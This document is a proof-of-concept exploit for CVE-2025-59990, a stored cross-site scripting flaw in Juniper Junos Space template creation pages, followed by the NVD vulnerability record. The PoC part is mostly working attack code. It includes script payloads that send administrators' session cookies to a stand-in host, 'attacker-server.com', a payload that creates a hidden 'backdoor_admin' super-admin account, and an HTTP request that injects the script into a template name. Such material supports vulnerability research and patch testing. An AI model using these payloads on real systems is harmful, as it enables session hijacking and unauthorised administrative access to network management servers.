CVE-2025-59990

<!-- CVE-2025-59990 PoC - Stored XSS in Juniper Junos Space Template Creation --> <!-- This PoC demonstrates the stored XSS vulnerability in template creation pages --> <!-- Step 1: Attacker crafts a malicious template with injected JavaScript --> <!-- The payload is injected into the template name or description field --> <!-- Malicious payload example 1: Cookie stealing --> <script> fetch('http://attacker-server.com/steal', { method: 'POST', body: JSON.stringify({cookie: document.cookie}), headers: {'Content-Type': 'application/json'} }); </script> <!-- Malicious payload example 2: Session hijacking via image beacon --> <img src=x onerror="fetch('http://attacker-server.com/steal?c='+document.cookie)"> <!-- Malicious payload example 3: Admin action execution (e.g., create backdoor user) --> <script> // Exfiltrate admin session and perform privileged actions var xhr = new XMLHttpRequest(); xhr.open('POST', '/api/user/create', true); xhr.setRequestHeader('Content-Type', 'application/json'); xhr.send(JSON.stringify({ username: 'backdoor_admin', password: 'P@ssw0rd123', role: 'super_admin' })); </script> <!-- Step 2: Submit the template via Junos Space API or web UI --> POST /api/space/template-management/templates HTTP/1.1 Host: junos-space-target.example.com Content-Type: application/json Cookie: session=<attacker_session> { "name": "<script>fetch('http://attacker-server.com/steal?c='+document.cookie)</script>", "description": "Legitimate template description with <img src=x onerror=alert(1)> payload", "content": "<device-configuration>...</device-configuration>" } <!-- Step 3: When an admin views the template list or template details page, --> <!-- the injected script executes in the admin's browser context, --> <!-- potentially stealing the admin session or performing privileged actions. -->

{"cve": {"id": "CVE-2025-59990", "sourceIdentifier": "[email protected]", "published": "2025-10-09T17:16:01.143", "lastModified": "2026-01-23T20:00:25.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the template creation pages that, when visited by another user, enable the attacker to execute commands with the target's permissions, including an administrator.\nThis issue affects all versions of Junos Space before 24.1R4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "2EC090A9-634B-4AA2-916F-7548AF71FF76"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r1:*:*:*:*:*:*", "matchCriteriaId": "0566970C-0E9B-4566-9920-C7C436A4243D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r2:*:*:*:*:*:*", "matchCriteriaId": "A2AA399D-5A7D-45B8-B774-D69054DFA4D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r3:*:*:*:*:*:*", "matchCriteriaId": "57CC4E1A-23AA-4B4A-8690-5EEDCBEC4BBE"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103140", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}